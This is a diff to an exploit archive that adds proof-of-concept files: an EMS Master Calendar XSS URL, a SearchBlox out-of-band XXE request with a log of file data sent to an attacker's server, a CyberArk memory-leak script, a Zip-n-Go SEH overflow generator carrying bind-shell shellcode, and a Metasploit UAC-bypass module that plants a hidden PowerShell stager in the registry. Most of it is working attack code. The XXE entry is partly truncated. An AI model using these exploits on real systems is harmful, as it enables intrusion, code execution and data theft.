diff --git a/exploits/aspx/webapps/44831.txt b/exploits/aspx/webapps/44831.txt new file mode 100644 index 000000000..3882d7000 --- /dev/null +++ b/exploits/aspx/webapps/44831.txt @@ -0,0 +1,16 @@ +# Exploit Title: EMS Master Calendar < 8.0.0.20180520 - Reflected Cross-Site Scripting +# Date: 2018-06-01 +# Exploit Author: Chris Barretto +# Vendor Homepage: https://www.emssoftware.com/ +# Software Link: https://docs.emssoftware.com/Content/V44.1_ReleaseNotes.htm +# Version: Versions prior to 8.0.0.201805210 are vulnerable +# Tested on: Master Calendar v8.0.0.127 +# CVE : CVE-2018-11628 + +# 1. Description: +# Data input into EMS Master Calendar before 8.0.0.201805210 via URL parameters are not properly sanitized, +# allowing malicious attackers to send a crafted URL and execute code in the context of the user's browser. + +#2. Proof of concept: +# The following PoC URL is available: +https://example.com/MasterCalendar/RssFeeds.aspx?Name=abcxyz \ No newline at end of file diff --git a/exploits/java/webapps/44827.txt b/exploits/java/webapps/44827.txt new file mode 100644 index 000000000..f33f24bf9 --- /dev/null +++ b/exploits/java/webapps/44827.txt @@ -0,0 +1,68 @@ +# Exploit Title: SearchBlox 8.6.7 Out-Of-Band XML eXternal Entity (OOB-XXE) +# Exploit Author: Ahmet GUREL, Canberk BOLAT +# Software Link: https://www.searchblox.com/ +# Version: < = SearchBlox Version 8.6.7 +# Platform: Java +# Tested on: Windows +# CVE: CVE-2018-11586 + +# 1. DETAILS + +An XML External Entity attack is a type of attack against an +application that parses XML input. This attack occurs when XML input +containing a reference to an external entity is processed by a weakly +configured XML parser. This attack may lead to the disclosure of +confidential data, denial of service, server side request forgery, +port scanning from the perspective of the machine where the parser is +located, and other system impacts. Reference: +https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing + +# 2. PoC: + +XML external entity (XXE) vulnerability in /searchblox/api/rest/status in +SearchBlox 8.6.7 allows remote unauthenticated users to read arbitrary +files or conduct server-side request forgery (SSRF) attacks via a crafted +DTD in an XML request. + +HTTP Request: +_____________ + +GET /searchblox/api/rest/status HTTP/1.1 +Host: localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101 +Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: JSESSIONID=n9uolja8nwkj15nsv66xjlzci; +XSRF-TOKEN=6098a021-0e3c-409f-9da0-b895eff3025d; AdsOnPage=5; +AdsOnSearchPage=5 +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Length: 140 + + + +%dtd; +%all; +%send;]> + +#Ext.dtd File : +_______________ + + + +"> +%all; + +#HTTP Response: +_______________ + +Ahmets-MacBook-Pro:Desktop ahmet$ python -m SimpleHTTPServer 7000 +Serving HTTP on 0.0.0.0 port 7000 ... +192.168.1.2 - - [03/Jun/2018 15:37:16] "GET /ext.dtd HTTP/1.1" 200 - +192.168.1.2 - - [03/Jun/2018 15:37:16] "GET +/?;%20for%2016-bit%20app%20support%20[fonts]%20[extensions]%20[mci%20extensions]%20[files]%20[Mail]%20MAPI=1 +HTTP/1.1" 200 - \ No newline at end of file diff --git a/exploits/linux/remote/44829.py b/exploits/linux/remote/44829.py new file mode 100755 index 000000000..b3d68d4c3 --- /dev/null +++ b/exploits/linux/remote/44829.py @@ -0,0 +1,46 @@ +# Exploit Title: CyberArk < 10 - Memory Disclosure +# Date: 2018-06-04 +# Exploit Author: Thomas Zuk +# Vendor Homepage: https://www.cyberark.com/products/privileged-account-security-solution/enterprise-password-vault/ +# Version: < 9.7 and < 10 +# Tested on: Windows 2008, Windows 2012, Windows 7, Windows 8, Windows 10 +# CVE: CVE-2018-9842 + +# Linux cmd line manual test: cat logon.bin | nc -vv IP 1858 | xxd +# paste the following bytes into a hexedited file named logon.bin: +#fffffffff7000000ffffffff3d0100005061636c695363726970745573657200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020202020ffffffff0000000000000000000073000000cececece00000000000000000000000000000000303d4c6f676f6efd3131353d372e32302e39302e3238fd36393d50fd3131363d30fd3130303dfd3231373d59fd3231383d5041434c49fd3231393dfd3331373d30fd3335373d30fd32323d5061636c6953637269707455736572fd3336373d3330fd0000 + + +#!/usr/bin/python + +import socket +import os +import sys + +ip = "10.107.32.21" +port = 1858 + +# Cyber Ark port 1858 is a proprietary software and protocol to perform login and administrative services. +# The below is a sample login request that is needed to receive the memory + +pacli_logon = "\xff\xff\xff\xff\xf7\x00\x00\x00\xff\xff\xff\xff\x3d\x01\x00\x00\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x20\x20\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x73\x00\x00\x00\xce\xce\xce\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x30\x3d\x4c\x6f\x67\x6f\x6e\xfd\x31\x31\x35\x3d\x37\x2e\x32\x30\x2e\x39\x30\x2e\x32\x38\xfd\x36\x39\x3d\x50\xfd\x31\x31\x36\x3d\x30\xfd\x31\x30\x30\x3d\xfd\x32\x31\x37\x3d\x59\xfd\x32\x31\x38\x3d\x50\x41\x43\x4c\x49\xfd\x32\x31\x39\x3d\xfd\x33\x31\x37\x3d\x30\xfd\x33\x35\x37\x3d\x30\xfd\x32\x32\x3d\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\xfd\x33\x36\x37\x3d\x33\x30\xfd\x00\x00" + + +for iteration in range(0, 110): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((ip, port)) + s.send(pacli_logon) + + # recieve response + s.recv(200) + reply = s.recv(1500) + + # write responses to file + file = open("cyberark_memory", "a") + + file.write("received: \n") + file.write(reply) + file.write("\n\n\n") + file.close() + + s.close() \ No newline at end of file diff --git a/exploits/windows/local/44828.py b/exploits/windows/local/44828.py new file mode 100755 index 000000000..9b90d6358 --- /dev/null +++ b/exploits/windows/local/44828.py @@ -0,0 +1,197 @@ +#!/usr/bin/python +#----------------------------------------------------------------------------------------------------------# +# Exploit Title : Zip-n-Go v4.9 - Local Buffer Overflow (SEH) # +# Exploit Author : Hashim Jawad - @ihack4falafel # +# Vendor Homepage : http://mc1soft.com/index.shtml # +# Vulnerable Software: http://mc1soft.com/files/zip-n-go49old.exe # +# Tested on : Windows 7 Enterprise - SP1 (x86) # +#----------------------------------------------------------------------------------------------------------# + +# Disclosure Timeline: +# ==================== +# 05-28-18: Contacted vendor, no response +# 05-30-18: Contacted vendor again, responded with patch and requested further testing +# 05-30-18: Patch did not seem to fix the problem and alternative approach were suggested +# 05-31-18: Vendor applied new patch and requested further testing +# 05-31-18: The new patch nullified the vulnerability +# 06-03-18: Version 4.95 was released +# 06-03-18: Proof of concept exploit published + +#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -e x86/alpha_mixed BufferRegister=EAX -f python -v shellcode +#Payload size: 710 bytes +shellcode = "" +shellcode += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58" +shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42" +shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +shellcode += "\x42\x75\x4a\x49\x39\x6c\x5a\x48\x6e\x62\x43\x30" +shellcode += "\x45\x50\x73\x30\x61\x70\x6d\x59\x7a\x45\x46\x51" +shellcode += "\x39\x50\x72\x44\x4e\x6b\x52\x70\x30\x30\x6c\x4b" +shellcode += "\x52\x72\x56\x6c\x6c\x4b\x73\x62\x37\x64\x4c\x4b" +shellcode += "\x32\x52\x51\x38\x54\x4f\x6f\x47\x31\x5a\x61\x36" +shellcode += "\x50\x31\x79\x6f\x4c\x6c\x35\x6c\x31\x71\x51\x6c" +shellcode += "\x47\x72\x46\x4c\x71\x30\x59\x51\x5a\x6f\x44\x4d" +shellcode += "\x56\x61\x6b\x77\x38\x62\x69\x62\x72\x72\x43\x67" +shellcode += "\x6e\x6b\x43\x62\x32\x30\x6c\x4b\x33\x7a\x55\x6c" +shellcode += "\x6c\x4b\x32\x6c\x34\x51\x34\x38\x6d\x33\x37\x38" +shellcode += "\x57\x71\x4a\x71\x66\x31\x6c\x4b\x42\x79\x51\x30" +shellcode += "\x65\x51\x59\x43\x4c\x4b\x52\x69\x45\x48\x6b\x53" +shellcode += "\x77\x4a\x47\x39\x4e\x6b\x76\x54\x4e\x6b\x46\x61" +shellcode += "\x58\x56\x36\x51\x59\x6f\x6e\x4c\x49\x51\x4a\x6f" +shellcode += "\x76\x6d\x35\x51\x68\x47\x57\x48\x49\x70\x62\x55" +shellcode += "\x48\x76\x56\x63\x31\x6d\x4a\x58\x55\x6b\x73\x4d" +shellcode += "\x35\x74\x33\x45\x4b\x54\x52\x78\x6c\x4b\x46\x38" +shellcode += "\x51\x34\x56\x61\x59\x43\x33\x56\x6c\x4b\x76\x6c" +shellcode += "\x50\x4b\x4e\x6b\x46\x38\x75\x4c\x67\x71\x68\x53" +shellcode += "\x6c\x4b\x34\x44\x4e\x6b\x47\x71\x78\x50\x4b\x39" +shellcode += "\x47\x34\x57\x54\x55\x74\x33\x6b\x33\x6b\x55\x31" +shellcode += "\x31\x49\x50\x5a\x42\x71\x4b\x4f\x4b\x50\x31\x4f" +shellcode += "\x31\x4f\x72\x7a\x4c\x4b\x54\x52\x6a\x4b\x6c\x4d" +shellcode += "\x31\x4d\x62\x48\x46\x53\x50\x32\x77\x70\x43\x30" +shellcode += "\x72\x48\x70\x77\x30\x73\x35\x62\x43\x6f\x50\x54" +shellcode += "\x70\x68\x72\x6c\x71\x67\x67\x56\x47\x77\x49\x6f" +shellcode += "\x68\x55\x6e\x58\x4c\x50\x43\x31\x45\x50\x53\x30" +shellcode += "\x46\x49\x78\x44\x33\x64\x62\x70\x50\x68\x76\x49" +shellcode += "\x4f\x70\x42\x4b\x43\x30\x69\x6f\x69\x45\x73\x5a" +shellcode += "\x67\x78\x31\x49\x42\x70\x6a\x42\x59\x6d\x71\x50" +shellcode += "\x32\x70\x73\x70\x36\x30\x70\x68\x78\x6a\x36\x6f" +shellcode += "\x69\x4f\x6d\x30\x6b\x4f\x69\x45\x4f\x67\x63\x58" +shellcode += "\x47\x72\x47\x70\x36\x71\x31\x4c\x6c\x49\x59\x76" +shellcode += "\x70\x6a\x74\x50\x31\x46\x61\x47\x45\x38\x4f\x32" +shellcode += "\x69\x4b\x54\x77\x35\x37\x79\x6f\x6a\x75\x66\x37" +shellcode += "\x51\x78\x4d\x67\x39\x79\x37\x48\x59\x6f\x39\x6f" +shellcode += "\x6a\x75\x62\x77\x61\x78\x43\x44\x68\x6c\x37\x4b" +shellcode += "\x68\x61\x69\x6f\x4a\x75\x70\x57\x5a\x37\x52\x48" +shellcode += "\x74\x35\x32\x4e\x52\x6d\x45\x31\x39\x6f\x4a\x75" +shellcode += "\x71\x78\x71\x73\x30\x6d\x32\x44\x65\x50\x4f\x79" +shellcode += "\x69\x73\x36\x37\x32\x77\x36\x37\x70\x31\x7a\x56" +shellcode += "\x51\x7a\x56\x72\x53\x69\x36\x36\x7a\x42\x49\x6d" +shellcode += "\x43\x56\x78\x47\x33\x74\x31\x34\x37\x4c\x67\x71" +shellcode += "\x46\x61\x6e\x6d\x53\x74\x34\x64\x62\x30\x6a\x66" +shellcode += "\x65\x50\x71\x54\x66\x34\x52\x70\x72\x76\x36\x36" +shellcode += "\x32\x76\x31\x56\x70\x56\x30\x4e\x53\x66\x52\x76" +shellcode += "\x31\x43\x32\x76\x52\x48\x64\x39\x38\x4c\x65\x6f" +shellcode += "\x4f\x76\x49\x6f\x78\x55\x4b\x39\x49\x70\x50\x4e" +shellcode += "\x53\x66\x31\x56\x79\x6f\x34\x70\x50\x68\x65\x58" +shellcode += "\x4e\x67\x57\x6d\x63\x50\x79\x6f\x38\x55\x4d\x6b" +shellcode += "\x68\x70\x78\x35\x6d\x72\x62\x76\x72\x48\x6d\x76" +shellcode += "\x4d\x45\x6f\x4d\x4f\x6d\x39\x6f\x4b\x65\x37\x4c" +shellcode += "\x77\x76\x71\x6c\x46\x6a\x6f\x70\x39\x6b\x4d\x30" +shellcode += "\x74\x35\x33\x35\x6f\x4b\x61\x57\x77\x63\x52\x52" +shellcode += "\x50\x6f\x32\x4a\x73\x30\x32\x73\x6b\x4f\x78\x55" +shellcode += "\x41\x41" + +####################### ZIP File Structure ######################## +################################################################### +######################## Local File Header ######################## +LocalFileHeader = '\x50\x4b\x03\x04' # local file header signature +LocalFileHeader += '\x14\x00' # version needed to extract 0x14 = 20 -> 2.0 +LocalFileHeader += '\x00\x00' # general purpose bit flag +LocalFileHeader += '\x00\x00' # compression method +LocalFileHeader += '\xb7\xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23 +LocalFileHeader += '\xce\x34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3 +LocalFileHeader += '\x00\x00\x00' # CRC-32 '\x00' was left out to make sure we hit 25 bytes before file length +LocalFileHeader += '\x00\x00\x00\x00' # compressed size +LocalFileHeader += '\x00\x00\x00\x00' # uncompressed size +LocalFileHeader += '\xe4\x0f' # file name length 0x0fe4 = 4068 bytes +LocalFileHeader += '\x00\x00' # extra field length +LocalFileHeader += '\x00' # file name +#LocalFileHeader += '\x00' # extra filed +################## Central Directory File Header ################## +CDFileHeader = '\x50\x4b\x01\x02' # cd file header signature +CDFileHeader += '\x14\x00' # version made by 0x14 = 20 -> 2.0 +CDFileHeader += '\x14\x00' # version needed to extract 0x14 = 20 -> 2.0 +CDFileHeader += '\x00\x00' # general purpose bit flag +CDFileHeader += '\x00\x00' # compression method +CDFileHeader += '\xb7\xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23 +CDFileHeader += '\xce\x34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3 +CDFileHeader += '\x00\x00\x00\x00' # CRC-32 +CDFileHeader += '\x00\x00\x00\x00' # compressed size +CDFileHeader += '\x00\x00\x00\x00' # uncompressed size +CDFileHeader += '\xe4\x0f' # file name length 0x0fe4 = 4068 bytes +CDFileHeader += '\x00\x00' # extra field length +CDFileHeader += '\x00\x00' # file comment length +CDFileHeader += '\x00\x00' # disk number where file starts +CDFileHeader += '\x01\x00' # internal file attributes BIT 0: apparent ASCII/text file +CDFileHeader += '\x24\x00\x00\x00' # external file attributes +CDFileHeader += '\x00\x00\x00\x00' # relative offset of local file header +#CDFileHeader += '\x00' # file name +#CDFileHeader += '\x00' # extra field +#CDFileHeader += '\x00' # file comment +################ End of Central Directory Record ################## +EOCDRHeader = '\x50\x4b\x05\x06' # End of central directory signature +EOCDRHeader += '\x00\x00' # number of this disk +EOCDRHeader += '\x00\x00' # disk where central directory starts +EOCDRHeader += '\x01\x00' # number of central directory records on this disk +EOCDRHeader += '\x01\x00' # total number of central directory records +EOCDRHeader += '\x12\x10\x00\x00' # size of central directory 0x1012 = 4114 bytes +EOCDRHeader += '\x02\x10\x00\x00' # offset of start of central directory, relative to start of archive +EOCDRHeader += '\x00\x00' # comment length +#EOCDRHeader += '\x00' # comment + +Witchcraft = '\x54' # PUSH ESP * save stack pointer +Witchcraft += '\x5F' # POP EDI +Witchcraft += '\x54' # PUSH ESP * calculate offset for decoder +Witchcraft += '\x58' # POP EAX +Witchcraft += '\x05\x11\x21\x11\x11' # ADD EAX,11112111 +Witchcraft += '\x05\x11\x21\x11\x11' # ADD EAX,11112111 +Witchcraft += '\x2D\x53\x25\x22\x22' # SUB EAX,22222553 +Witchcraft += '\x50' # PUSH EAX +Witchcraft += '\x5C' # POP ESP + +#https://github.com/ihack4falafel/Slink +#root@kali:/opt/Slink# python Slink.py * decode the following 'nop;mov esp, edi;mov eax, edi;add eax, 58c;jmp eax' +#Enter your shellcode: 9089FC89F8058C050000FFE0 +#[+] Shellcode size is divisible by 4 +#[+] Encoding [e0ff0000].. +#[!] [01] and/or [f] and/or [00] found, using alterantive encoder.. +Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a +Witchcraft += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235 +Witchcraft += "\x05\x11\x11\x77\x61" ## add eax, 0x61771111 +Witchcraft += "\x05\x11\x11\x66\x51" ## add eax, 0x51661111 +Witchcraft += "\x05\x11\x11\x55\x61" ## add eax, 0x61551111 +Witchcraft += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333 +Witchcraft += "\x50" ## push eax +#[+] Encoding [058c05f8].. +#[!] [01] and/or [f] and/or [00] found, using alterantive encoder.. +Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a +Witchcraft += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235 +Witchcraft += "\x05\x74\x13\x46\x13" ## add eax, 0x13461374 +Witchcraft += "\x05\x64\x13\x45\x13" ## add eax, 0x13451364 +Witchcraft += "\x05\x53\x12\x34\x12" ## add eax, 0x12341253 +Witchcraft += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333 +Witchcraft += "\x50" ## push eax +#[+] Encoding [89fc8990].. +#[!] [01] and/or [f] and/or [00] found, using alterantive encoder.. +Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a +Witchcraft += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235 +Witchcraft += "\x05\x41\x44\x76\x44" ## add eax, 0x44764441 +Witchcraft += "\x05\x41\x44\x65\x44" ## add eax, 0x44654441 +Witchcraft += "\x05\x41\x34\x54\x34" ## add eax, 0x34543441 +Witchcraft += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333 +Witchcraft += "\x50" ## push eax + +Evil = '\x41' * 3066 # offset to shellcode +Evil += shellcode # bind shell +Evil += '\x43' * (716-len(shellcode)) # shellcode host +Evil += Witchcraft # magic! +Evil += '\x42' * (126-len(Witchcraft)) # witchcraft host +Evil += '\x74\x80\x75\x80' # nSEH - short jump backward (jump net) +Evil += '\x6e\x4c\x40\x00' # SEH - pop ecx, pop ebp, retn in zip-n-go.exe +Evil += '\x41' * (4064-3908-4-4) +Evil += '.txt' + +buffer = LocalFileHeader +buffer += Evil +buffer += CDFileHeader +buffer += Evil +buffer += EOCDRHeader + +try: + f=open("Evil.zip","w") + print "[+] Creating %s bytes evil payload.." %len(Evil) + f.write(buffer) + f.close() + print "[+] File created!" +except Exception as e: + print e \ No newline at end of file diff --git a/exploits/windows/local/44830.rb b/exploits/windows/local/44830.rb new file mode 100755 index 000000000..3601892eb --- /dev/null +++ b/exploits/windows/local/44830.rb @@ -0,0 +1,205 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/exploit/exe' +require 'msf/core/exploit/powershell' + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Exploit::Powershell + include Post::Windows::Priv + include Post::Windows::Registry + include Post::Windows::Runas + + SLUI_DEL_KEY = "HKCU\\Software\\Classes\\exefile".freeze + SLUI_WRITE_KEY = "HKCU\\Software\\Classes\\exefile\\shell\\open\\command".freeze + EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze + EXEC_REG_VAL = ''.freeze # This maps to "(Default)" + EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze + SLUI_PATH = "%WINDIR%\\System32\\slui.exe".freeze + CMD_MAX_LEN = 16383 + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Windows UAC Protection Bypass (Via Slui File Handler Hijack)', + 'Description' => %q{ + This module will bypass UAC on Windows 8-10 by hijacking a special key in the Registry under + the Current User hive, and inserting a custom command that will get invoked when any binary + (.exe) application is launched. But slui.exe is an auto-elevated binary that is vulnerable + to file handler hijacking. When we run slui.exe with changed Registry key + (HKCU:\Software\Classes\exefile\shell\open\command), it will run our custom command as Admin + instead of slui.exe. + + The module modifies the registry in order for this exploit to work. The modification is + reverted once the exploitation attempt has finished. + + The module does not require the architecture of the payload to match the OS. If + specifying EXE::Custom your DLL should call ExitProcess() after starting the + payload in a different process. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'bytecode-77', # UAC bypass discovery and research + 'gushmazuko', # MSF & PowerShell module + ], + 'Platform' => ['win'], + 'SessionTypes' => ['meterpreter'], + 'Targets' => [ + ['Windows x86', { 'Arch' => ARCH_X86 }], + ['Windows x64', { 'Arch' => ARCH_X64 }] + ], + 'DefaultTarget' => 0, + 'References' => [ + [ + 'URL', 'https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation', + 'URL', 'https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1' + ] + ], + 'DisclosureDate' => 'Jan 15 2018' + ) + ) + end + + def check + if sysinfo['OS'] =~ /Windows (8|10)/ && is_uac_enabled? + CheckCode::Appears + else + CheckCode::Safe + end + end + + def exploit + # Validate that we can actually do things before we bother + # doing any more work + check_permissions! + + commspec = 'powershell' + registry_view = REGISTRY_VIEW_NATIVE + psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe" + + # Make sure we have a sane payload configuration + if sysinfo['Architecture'] == ARCH_X64 + if session.arch == ARCH_X86 + # On x64, check arch + commspec = '%WINDIR%\\Sysnative\\cmd.exe /c powershell' + if target_arch.first == ARCH_X64 + # We can't use absolute path here as + # %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session + psh_path = "powershell.exe" + end + end + if target_arch.first == ARCH_X86 + # Invoking x86, so switch to SysWOW64 + psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe" + end + else + # if we're on x86, we can't handle x64 payloads + if target_arch.first == ARCH_X64 + fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System') + end + end + + if !payload.arch.empty? && (payload.arch.first != target_arch.first) + fail_with(Failure::BadConfig, 'payload and target should use the same architecture') + end + + case get_uac_level + when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, + UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, + UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT + fail_with(Failure::NotVulnerable, + "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...") + when UAC_DEFAULT + print_good('UAC is set to Default') + print_good('BypassUAC can bypass this setting, continuing...') + when UAC_NO_PROMPT + print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') + shell_execute_exe + return + end + + payload_value = rand_text_alpha(8) + psh_path = expand_path(psh_path) + + template_path = Rex::Powershell::Templates::TEMPLATE_DIR + psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded) + + if psh_payload.length > CMD_MAX_LEN + fail_with(Failure::None, "Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})") + end + + psh_stager = "\"IEX (Get-ItemProperty -Path #{SLUI_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\"" + cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}" + + existing = registry_getvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, registry_view) || "" + exist_delegate = !registry_getvaldata(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil? + + if existing.empty? + registry_createkey(SLUI_WRITE_KEY, registry_view) + end + + print_status("Configuring payload and stager registry keys ...") + unless exist_delegate + registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view) + end + + registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view) + registry_setvaldata(SLUI_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view) + + # Calling slui.exe through cmd.exe allow us to launch it from either x86 or x64 session arch. + cmd_path = expand_path(commspec) + cmd_args = expand_path("Start-Process #{SLUI_PATH} -Verb runas") + print_status("Executing payload: #{cmd_path} #{cmd_args}") + + # We can't use cmd_exec here because it blocks, waiting for a result. + client.sys.process.execute(cmd_path, cmd_args, 'Hidden' => true) + + # Wait a copule of seconds to give the payload a chance to fire before cleaning up + # TODO: fix this up to use something smarter than a timeout? + sleep(3) + + handler(client) + + print_status("Cleaining ...") + unless exist_delegate + registry_deleteval(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view) + end + if existing.empty? + registry_deletekey(SLUI_DEL_KEY, registry_view) + else + registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view) + end + registry_deleteval(SLUI_WRITE_KEY, payload_value, registry_view) + end + + def check_permissions! + unless check == Exploit::CheckCode::Appears + fail_with(Failure::NotVulnerable, "Target is not vulnerable.") + end + fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? + # Check if you are an admin + # is_in_admin_group can be nil, true, or false + print_status('UAC is Enabled, checking level...') + vprint_status('Checking admin status...') + admin_group = is_in_admin_group? + if admin_group.nil? + print_error('Either whoami is not there or failed to execute') + print_error('Continuing under assumption you already checked...') + else + if admin_group + print_good('Part of Administrators group! Continuing...') + else + fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') + end + end + + if get_integrity_level == INTEGRITY_LEVEL_SID[:low] + fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') + end + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b63bf164b..501b93d3d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9714,7 +9714,7 @@ id,file,description,date,author,type,platform,port 44479,exploits/windows_x86/local/44479.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017)",2018-03-15,xiaodaozhi,local,windows_x86, 44480,exploits/windows_x86/local/44480.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039)",2018-03-01,xiaodaozhi,local,windows_x86, 44499,exploits/windows_x86/local/44499.py,"Free Download Manager 2.0 Built 417 - Local Buffer Overflow (SEH)",2018-04-23,"Marwan Shamel",local,windows_x86, -44516,exploits/windows/local/44516.py,"R 3.4.4 - Local Buffer Overflow",2018-04-24,bzyo,local,windows, +44516,exploits/windows/local/44516.py,"RGui 3.4.4 - Local Buffer Overflow",2018-04-24,bzyo,local,windows, 44518,exploits/windows/local/44518.py,"Allok Video to DVD Burner 2.6.1217 - Buffer Overflow (SEH)",2018-04-24,T3jv1l,local,windows, 44523,exploits/linux/local/44523.rb,"lastore-daemon D-Bus - Privilege Escalation (Metasploit)",2018-04-24,Metasploit,local,linux, 44549,exploits/windows/local/44549.py,"Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH)",2018-04-26,T3jv1l,local,windows, @@ -9755,6 +9755,8 @@ id,file,description,date,author,type,platform,port 44818,exploits/hardware/local/44818.md,"Sony Playstation 4 (PS4) 5.07 - 'Jailbreak' WebKit / 'bpf v2' Kernel Loader",2018-05-28,Specter,local,hardware, 44819,exploits/hardware/local/44819.js,"Sony Playstation 4 (PS4) 5.1 - Kernel (PoC)",2018-05-28,qwertyoruiop,local,hardware, 44820,exploits/hardware/local/44820.txt,"Sony Playstation 3 (PS3) 4.82 - 'Jailbreak' (ROP)",2018-01-28,PS3Xploit,local,hardware, +44828,exploits/windows/local/44828.py,"Zip-n-Go 4.9 - Buffer Overflow (SEH)",2018-06-04,"Hashim Jawad",local,windows, +44830,exploits/windows/local/44830.rb,"Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit)",2018-06-04,Metasploit,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16540,6 +16542,7 @@ id,file,description,date,author,type,platform,port 44779,exploits/hardware/remote/44779.txt,"Bitmain Antminer D3/L3+/S9 - Remote Command Execution",2018-05-27,CorryL,remote,hardware, 44784,exploits/windows_x86-64/remote/44784.py,"CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)",2018-05-28,"Juan Prescotto",remote,windows_x86-64, 44822,exploits/linux/remote/44822.txt,"Git < 2.17.1 - Remote Code Execution",2018-06-01,JameelNabbo,remote,linux, +44829,exploits/linux/remote/44829.py,"CyberArk < 10 - Memory Disclosure",2018-06-04,"Thomas Zuk",remote,linux, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP 